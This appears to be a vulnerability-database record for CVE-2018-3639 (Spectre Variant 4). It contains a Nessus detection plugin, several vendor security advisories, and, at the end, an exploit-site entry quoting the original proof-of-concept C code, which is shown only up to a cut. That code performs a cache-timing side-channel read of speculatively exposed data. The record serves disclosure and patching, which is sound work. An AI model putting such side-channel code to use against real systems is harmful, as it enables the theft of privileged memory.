attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2018:1633 :\n\nAn update for qemu-kvm is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution\nfor Linux on a variety of architectures. The qemu-kvm packages provide\nthe user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor's data cache even\nfor speculatively executed instructions that never actually commit\n(retire). As a result, an unprivileged attacker could use this flaw to\nread privileged memory by conducting targeted cache side-channel\nattacks. (CVE-2018-3639)\n\nNote: This is the qemu-kvm side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-May/007749.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected qemu-kvm packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-img\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-kvm-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:qemu-kvm-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-img-1.5.3-156.el7_5.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-kvm-1.5.3-156.el7_5.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-kvm-common-1.5.3-156.el7_5.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"qemu-kvm-tools-1.5.3-156.el7_5.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu-img / qemu-kvm / qemu-kvm-common / qemu-kvm-tools\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:29", "bulletinFamily": "unix", "description": "[1:1.7.0.181-2.6.14.8.0.1]\n- Update DISTRO_NAME in specfile\n[1:1.7.0.181-2.6.14.8]\n- added and applied 1566890_embargoed20180521.patch\n- Resolves: rhbz#1578550", "modified": "2018-05-22T00:00:00", "published": "2018-05-22T00:00:00", "id": "ELSA-2018-1647", "href": "http://linux.oracle.com/errata/ELSA-2018-1647.html", "title": "java-1.7.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:22", "bulletinFamily": "unix", "description": "[12:2.9.0-11.1.el7]\n- i386: Define the Virt SSBD MSR and handling of it (CVE-2018-3639) (Konrad Rzeszutek Wilk) [Orabug: 28110449] {CVE-2018-3639}\n- i386: define the AMD 'virt-ssbd' CPUID feature bit (CVE-2018-3639) (Konrad Rzeszutek Wilk) [Orabug: 28110449] {CVE-2018-3639}\n- i386: define the 'ssbd' CPUID feature bit (CVE-2018-3639) (Daniel P. Berrange) [Orabug: 28110449] {CVE-2018-3639}", "modified": "2018-08-15T00:00:00", "published": "2018-08-15T00:00:00", "id": "ELSA-2018-4198", "href": "http://linux.oracle.com/errata/ELSA-2018-4198.html", "title": "qemu security update", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:13", "bulletinFamily": "unix", "description": "[2.6.32-696.30.1.OL6]\n- Update genkey [bug 25599697]\n[2.6.32-696.30.1]\n- [x86] x86/kvm: fix CPUID_7_EDX (word 18) mask (Jan Stancek) [1566893 1566899] {CVE-2018-3639}\n[2.6.32-696.29.1]\n- [x86] x86/spec_ctrl: Fix late microcode problem with AMD (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/spec_ctrl: Clean up entry code & remove unused APIs (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/spec_ctrl: Mask off SPEC_CTRL MSR bits that are managed by kernel (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/spec_ctrl: add support for SSBD to RHEL IBRS entry/exit macros (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/bugs: Rename _RDS to _SSBD (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/speculation: Add prctl for Speculative Store Bypass mitigation (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/process: Allow runtime control of Speculative Store Bypass (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [kernel] prctl: Add speculation control prctls (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/kvm: Expose the RDS bit to the guest (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/bugs/AMD: Add support to disable RDS on Fam[15, 16, 17]h if requested (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/spec_ctrl: Sync up RDS setting with IBRS code (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/bugs: Provide boot parameters for the spec_store_bypass_disable mitigation (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/bugs: Expose the /sys/../spec_store_bypass and X86_BUG_SPEC_STORE_BYPASS (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/bugs: Read SPEC_CTRL MSR during boot and re-use reserved bits (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/spec_ctrl: Use separate PCP variables for IBRS entry and exit (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] cpu/intel: Knight Mill and Moorefield update to intel-family.h (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/speculation: Update Speculation Control microcode blacklist (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/cpuid: Fix up 'virtual' IBRS/IBPB/STIBP feature bits on Intel (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/cpufeatures: Clean up Spectre v2 related CPUID flags (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/cpufeatures: Add AMD feature bits for Speculation Control (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/cpufeatures: Add Intel feature bits for Speculation (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/cpufeatures: Add CPUID_7_EDX CPUID leaf (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] x86/cpu: Fill in feature word 13, CPUID_8000_0008_EBX (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] Extend RH cpuinfo to 10 extra words (Waiman Long) [1566893 1566899] {CVE-2018-3639}\n- [x86] kpti/kexec: fix wrong page address in clear_page (Dave Young) [1573176 1572487]", "modified": "2018-05-22T00:00:00", "published": "2018-05-22T00:00:00", "id": "ELSA-2018-1651", "href": "http://linux.oracle.com/errata/ELSA-2018-1651.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}], "suse": [{"lastseen": "2018-08-13T14:54:46", "bulletinFamily": "unix", "description": "This update for libvirt fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2018-3639: Add support for 'ssbd' and 'virt-ssbd' CPUID feature bits\n to address V4 Speculative Store Bypass aka "Memory Disambiguation"\n (bsc#1092885).\n\n Bug fixes:\n\n - bsc#1094325: Enable virsh blockresize for XEN guests (FATE#325467).\n - bsc#1095556: Fix qemu VM creating with --boot uefi due to missing\n AppArmor profile.\n - bsc#1094725: Fix `virsh blockresize` to work with Xen qdisks.\n - bsc#1094480: Fix `virsh list` to list domains with `xl list`.\n - bsc#1087416: Fix missing video device within guest with default\n installation by virt-mamanger.\n - bsc#1079150: Fix libvirt-guests start dependency.\n - bsc#1076861: Fix locking of lockspace resource\n '/devcfs/disks/uatidmsvn1-xvda'.\n - bsc#1074014: Fix KVM live migration when shutting down cluster node.\n - bsc#959329: Fix wrong state of VMs in virtual manager.\n\n This update was imported from the SUSE:SLE-12-SP3:Update update project.\n\n", "modified": "2018-08-13T12:07:25", "published": "2018-08-13T12:07:25", "id": "OPENSUSE-SU-2018:2306-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-08/msg00043.html", "title": "Security update for libvirt (moderate)", "type": "suse", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "ubuntu": [{"lastseen": "2019-05-29T19:20:49", "bulletinFamily": "unix", "description": "Ken Johnson and Jann Horn independently discovered that microprocessors utilizing speculative execution of a memory read may allow unauthorized memory reads via sidechannel attacks. An attacker in the guest could use this to expose sensitive guest information, including kernel memory. This update allows QEMU to expose new CPU features added by AMD microcode updates to guests on amd64 and i386.", "modified": "2018-06-12T00:00:00", "published": "2018-06-12T00:00:00", "id": "USN-3679-1", "href": "https://usn.ubuntu.com/3679-1/", "title": "QEMU update", "type": "ubuntu", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T19:20:46", "bulletinFamily": "unix", "description": "Jann Horn and Ken Johnson discovered that microprocessors utilizing speculative execution of a memory read may allow unauthorized memory reads via a sidechannel attack. This flaw is known as Spectre Variant 4. A local attacker could use this to expose sensitive information, including kernel memory.", "modified": "2018-05-22T00:00:00", "published": "2018-05-22T00:00:00", "id": "USN-3652-1", "href": "https://usn.ubuntu.com/3652-1/", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T19:22:05", "bulletinFamily": "unix", "description": "Ken Johnson and Jann Horn independently discovered that microprocessors utilizing speculative execution of a memory read may allow unauthorized memory reads via sidechannel attacks. An attacker in the guest could use this to expose sensitive guest information, including kernel memory. This update allows QEMU to expose new CPU features added by microcode updates to guests on amd64 and i386.", "modified": "2018-05-21T00:00:00", "published": "2018-05-21T00:00:00", "id": "USN-3651-1", "href": "https://usn.ubuntu.com/3651-1/", "title": "QEMU update", "type": "ubuntu", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}], "centos": [{"lastseen": "2019-12-20T18:27:33", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2018:1997\n\n\nThe libvirt library contains a C API for managing and interacting with the virtualization capabilities of Linux and other operating systems. In addition, libvirt provides tools for remote management of virtualized systems.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639)\n\nNote: This is the libvirt side of the CVE-2018-3639 mitigation that includes support for guests running on hosts with AMD processors.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.\n\nBug Fix(es):\n\n* Previously, the virtlogd service logged redundant AVC denial errors when a guest virtual machine was started. With this update, the virtlogd service no longer attempts to send shutdown inhibition calls to systemd, which prevents the described errors from occurring. (BZ#1573268)\n\n* Prior to this update, guest virtual machine actions that use a python library in some cases failed and \"Hash operation not allowed during iteration\" error messages were logged. Several redundant thread access checks have been removed, and the problem no longer occurs. (BZ#1581364)\n\n* The \"virsh capabilities\" command previously displayed an inaccurate number of 4 KiB memory pages on systems with very large amounts of memory. This update optimizes the memory diagnostic mechanism to ensure memory page numbers are displayed correctly on such systems. (BZ#1582418)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-July/022946.html\n\n**Affected packages:**\nlibvirt\nlibvirt-admin\nlibvirt-client\nlibvirt-daemon\nlibvirt-daemon-config-network\nlibvirt-daemon-config-nwfilter\nlibvirt-daemon-driver-interface\nlibvirt-daemon-driver-lxc\nlibvirt-daemon-driver-network\nlibvirt-daemon-driver-nodedev\nlibvirt-daemon-driver-nwfilter\nlibvirt-daemon-driver-qemu\nlibvirt-daemon-driver-secret\nlibvirt-daemon-driver-storage\nlibvirt-daemon-driver-storage-core\nlibvirt-daemon-driver-storage-disk\nlibvirt-daemon-driver-storage-gluster\nlibvirt-daemon-driver-storage-iscsi\nlibvirt-daemon-driver-storage-logical\nlibvirt-daemon-driver-storage-mpath\nlibvirt-daemon-driver-storage-rbd\nlibvirt-daemon-driver-storage-scsi\nlibvirt-daemon-kvm\nlibvirt-daemon-lxc\nlibvirt-devel\nlibvirt-docs\nlibvirt-libs\nlibvirt-lock-sanlock\nlibvirt-login-shell\nlibvirt-nss\n\n**Upstream details at:**\n", "modified": "2018-07-03T18:53:48", "published": "2018-07-03T18:53:48", "id": "CESA-2018:1997", "href": "http://lists.centos.org/pipermail/centos-announce/2018-July/022946.html", "title": "libvirt security update", "type": "centos", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-12-20T18:28:04", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2018:1632\n\n\nThe libvirt library contains a C API for managing and interacting with the virtualization capabilities of Linux and other operating systems. In addition, libvirt provides tools for remote management of virtualized systems.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639)\n\nNote: This is the libvirt side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-May/022840.html\n\n**Affected packages:**\nlibvirt\nlibvirt-admin\nlibvirt-client\nlibvirt-daemon\nlibvirt-daemon-config-network\nlibvirt-daemon-config-nwfilter\nlibvirt-daemon-driver-interface\nlibvirt-daemon-driver-lxc\nlibvirt-daemon-driver-network\nlibvirt-daemon-driver-nodedev\nlibvirt-daemon-driver-nwfilter\nlibvirt-daemon-driver-qemu\nlibvirt-daemon-driver-secret\nlibvirt-daemon-driver-storage\nlibvirt-daemon-driver-storage-core\nlibvirt-daemon-driver-storage-disk\nlibvirt-daemon-driver-storage-gluster\nlibvirt-daemon-driver-storage-iscsi\nlibvirt-daemon-driver-storage-logical\nlibvirt-daemon-driver-storage-mpath\nlibvirt-daemon-driver-storage-rbd\nlibvirt-daemon-driver-storage-scsi\nlibvirt-daemon-kvm\nlibvirt-daemon-lxc\nlibvirt-devel\nlibvirt-docs\nlibvirt-libs\nlibvirt-lock-sanlock\nlibvirt-login-shell\nlibvirt-nss\n\n**Upstream details at:**\n", "modified": "2018-05-22T18:17:15", "published": "2018-05-22T18:17:15", "id": "CESA-2018:1632", "href": "http://lists.centos.org/pipermail/centos-announce/2018-May/022840.html", "title": "libvirt security update", "type": "centos", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-12-20T18:28:07", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2018:1650\n\n\nThe java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639)\n\nNote: This is the OpenJDK side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-May/022833.html\n\n**Affected packages:**\njava-1.8.0-openjdk\njava-1.8.0-openjdk-debug\njava-1.8.0-openjdk-demo\njava-1.8.0-openjdk-demo-debug\njava-1.8.0-openjdk-devel\njava-1.8.0-openjdk-devel-debug\njava-1.8.0-openjdk-headless\njava-1.8.0-openjdk-headless-debug\njava-1.8.0-openjdk-javadoc\njava-1.8.0-openjdk-javadoc-debug\njava-1.8.0-openjdk-src\njava-1.8.0-openjdk-src-debug\n\n**Upstream details at:**\n", "modified": "2018-05-22T15:30:51", "published": "2018-05-22T15:30:51", "id": "CESA-2018:1650", "href": "http://lists.centos.org/pipermail/centos-announce/2018-May/022833.html", "title": "java security update", "type": "centos", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-12-20T18:25:52", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2018:1648\n\n\nThe java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639)\n\nNote: This is the OpenJDK side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-May/022838.html\n\n**Affected packages:**\njava-1.7.0-openjdk\njava-1.7.0-openjdk-accessibility\njava-1.7.0-openjdk-demo\njava-1.7.0-openjdk-devel\njava-1.7.0-openjdk-headless\njava-1.7.0-openjdk-javadoc\njava-1.7.0-openjdk-src\n\n**Upstream details at:**\n", "modified": "2018-05-22T18:16:24", "published": "2018-05-22T18:16:24", "id": "CESA-2018:1648", "href": "http://lists.centos.org/pipermail/centos-announce/2018-May/022838.html", "title": "java security update", "type": "centos", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}], "zdt": [{"lastseen": "2018-05-23T02:47:33", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category dos / poc", "modified": "2018-05-23T00:00:00", "published": "2018-05-23T00:00:00", "id": "1337DAY-ID-30428", "href": "https://0day.today/exploit/description/30428", "title": "AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass Exploit", "type": "zdt", "sourceData": "/*\r\n======== Intro / Overview ========\r\nAfter Michael Schwarz made some interesting observations, we started\r\nlooking into variants other than the three already-known ones.\r\n \r\nI noticed that Intel's Optimization Manual says in\r\nsection 2.4.4.5 (\"Memory Disambiguation\"):\r\n \r\n A load instruction micro-op may depend on a preceding store. Many\r\n microarchitectures block loads until all preceding store address\r\n are known.\r\n The memory disambiguator predicts which loads will not depend on\r\n any previous stores. When the disambiguator predicts that a load\r\n does not have such a dependency, the load takes its data from the\r\n L1 data cache.\r\n Eventually, the prediction is verified. If an actual conflict is\r\n detected, the load and all succeeding instructions are re-executed.\r\n \r\nAccording to my experiments, this effect can be used to cause\r\nspeculative execution to continue far enough to execute a\r\nSpectre-style gadget on a pointer read from a memory slot to which a\r\nstore has been speculatively ignored. I have tested this behavior on\r\nthe following processors from Intel and AMD:\r\n \r\n - Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz [Skylake laptop]\r\n - AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G [AMD desktop]\r\n - Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz [Haswell desktop]\r\n \r\nI haven't yet tested this on any ARM CPU.\r\n \r\nInterestingly, only on the Skylake laptop, it seems to work when\r\ninterrupts and SMP are disabled while the test is running; on the\r\nother machines, it seems to only work when interrupts are enabled,\r\nmaybe because the kernel code cause some noise that garbles some\r\npredictor state or so? Or just because they mess up timing\r\nsomewhere...\r\n \r\n \r\nThere were mentions of data speculation on the netdev list, in a\r\nsomewhat different context:\r\n \r\nhttps://www.mail-archive.com/[email\u00a0protected]/msg212262.html\r\nhttps://www.mail-archive.com/[email\u00a0protected]/msg215369.html\r\n \r\nHowever, I'm not entirely sure about the terminology. Do\r\n\"data speculation\" and \"value speculation\" include speculating about\r\nthe *source* of data, or do they refer exclusively to directly\r\nspeculating about the *value* of data?\r\n \r\n \r\n \r\n \r\n \r\n======== Demo code (no privilege boundaries crossed) ========\r\nThis is some code that purely demonstrates the basic effect and shows\r\nthat it is possible to combine it with a Meltdown/Spectre-style\r\ngadget for leaking data into the cache. It does not cross any\r\nprivilege boundaries.\r\n \r\n----------------------- START -----------------------\r\n// compile with: gcc -o test test.c -Wall -DHIT_THRESHOLD={CYCLES}\r\n// optionally add: -DNO_INTERRUPTS\r\n \r\n#include <stdio.h>\r\n#include <sys/io.h>\r\n#include <err.h>\r\n#include <sys/mman.h>\r\n \r\n#define pipeline_flush() asm volatile(\"mov $0,\r\n%%eax\\n\\tcpuid\\n\\tlfence\" : /*out*/ : /*in*/ :\r\n\"rax\",\"rbx\",\"rcx\",\"rdx\",\"memory\")\r\n#define clflush(addr) asm volatile(\"clflush (%0)\"::\"r\"(addr):\"memory\")\r\n \r\n// source of high-latency pointer to the memory slot\r\nunsigned char **flushy_area[1000];\r\n#define flushy (flushy_area+500)\r\n \r\n// memory slot on which we want bad memory disambiguation\r\nunsigned char *memory_slot_area[1000];\r\n#define memory_slot (memory_slot_area+500)\r\n \r\n// 0123456789abcdef\r\nunsigned char secret_read_area[] = \"0000011011101011\";\r\nunsigned char public_read_area[] = \"################\";\r\n \r\nunsigned char timey_line_area[0x200000];\r\n// stored in the memory slot first\r\n#define timey_lines (timey_line_area + 0x10000)\r\n \r\nunsigned char dummy_char_sink;\r\n \r\nint testfun(int idx) {\r\n pipeline_flush();\r\n *flushy = memory_slot;\r\n *memory_slot = secret_read_area;\r\n timey_lines['0' << 12] = 1;\r\n timey_lines['1' << 12] = 1;\r\n pipeline_flush();\r\n clflush(flushy);\r\n clflush(&timey_lines['0' << 12]);\r\n clflush(&timey_lines['1' << 12]);\r\n asm volatile(\"mfence\");\r\n pipeline_flush();\r\n \r\n // START OF CRITICAL PATH\r\n unsigned char **memory_slot__slowptr = *flushy;\r\n //pipeline_flush();\r\n // the following store will be speculatively ignored since its\r\naddress is unknown\r\n *memory_slot__slowptr = public_read_area;\r\n // uncomment the instructions in the next line to break the attack\r\n asm volatile(\"\" /*\"mov $0, %%eax\\n\\tcpuid\\n\\tlfence\"*/ : /*out*/ :\r\n/*in*/ : \"rax\",\"rbx\",\"rcx\",\"rdx\",\"memory\");\r\n // architectual read from dummy_timey_line, possible\r\nmicroarchitectural read from timey_line\r\n dummy_char_sink = timey_lines[(*memory_slot)[idx] << 12];\r\n // END OF CRITICAL PATH\r\n \r\n unsigned int t1, t2;\r\n \r\n pipeline_flush();\r\n asm volatile(\r\n \"lfence\\n\\t\"\r\n \"rdtscp\\n\\t\"\r\n \"mov %%eax, %%ebx\\n\\t\"\r\n \"mov (%%rdi), %%r11\\n\\t\"\r\n \"rdtscp\\n\\t\"\r\n \"lfence\\n\\t\"\r\n ://out\r\n \"=a\"(t2),\r\n \"=b\"(t1)\r\n ://in\r\n \"D\"(timey_lines + 0x1000 * '0')\r\n ://clobber\r\n \"r11\",\r\n \"rcx\",\r\n \"rdx\",\r\n \"memory\"\r\n );\r\n pipeline_flush();\r\n unsigned int delay_0 = t2 - t1;\r\n \r\n pipeline_flush();\r\n asm volatile(\r\n \"lfence\\n\\t\"\r\n \"rdtscp\\n\\t\"\r\n \"mov %%eax, %%ebx\\n\\t\"\r\n \"mov (%%rdi), %%r11\\n\\t\"\r\n \"rdtscp\\n\\t\"\r\n \"lfence\\n\\t\"\r\n ://out\r\n \"=a\"(t2),\r\n \"=b\"(t1)\r\n ://in\r\n \"D\"(timey_lines + 0x1000 * '1')\r\n ://clobber\r\n \"r11\",\r\n \"rcx\",\r\n \"rdx\",\r\n \"memory\"\r\n );\r\n pipeline_flush();\r\n unsigned int delay_1 = t2 - t1;\r\n \r\n if (delay_0 < HIT_THRESHOLD && delay_1 > HIT_THRESHOLD) {\r\n pipeline_flush();\r\n return 0;\r\n }\r\n if (delay_0 > HIT_THRESHOLD && delay_1 < HIT_THRESHOLD) {\r\n pipeline_flush();\r\n return 1;\r\n }\r\n pipeline_flush();\r\n return -1;\r\n}\r\n \r\nint main(void) {\r\n char out[100000];\r\n char *out_ = out;\r\n \r\n#ifdef NO_INTERRUPTS\r\n if (mlockall(MCL_CURRENT|MCL_FUTURE) || iopl(3))\r\n err(1, \"iopl(3)\");\r\n#endif\r\n \r\n for (int idx = 0; idx < 16; idx++) {\r\n#ifdef NO_INTERRUPTS\r\n asm volatile(\"cli\");\r\n#endif\r\n pipeline_flush();\r\n long cycles = 0;\r\n int hits = 0;\r\n char results[33] = {0};\r\n /* if we don't break the loop after some time when it doesn't\r\nwork, in NO_INTERRUPTS mode with SMP disabled, the machine will lock\r\nup */\r\n while (hits < 32 && cycles < 1000000) {\r\n pipeline_flush();\r\n int res = testfun(idx);\r\n if (res != -1) {\r\n pipeline_flush();\r\n 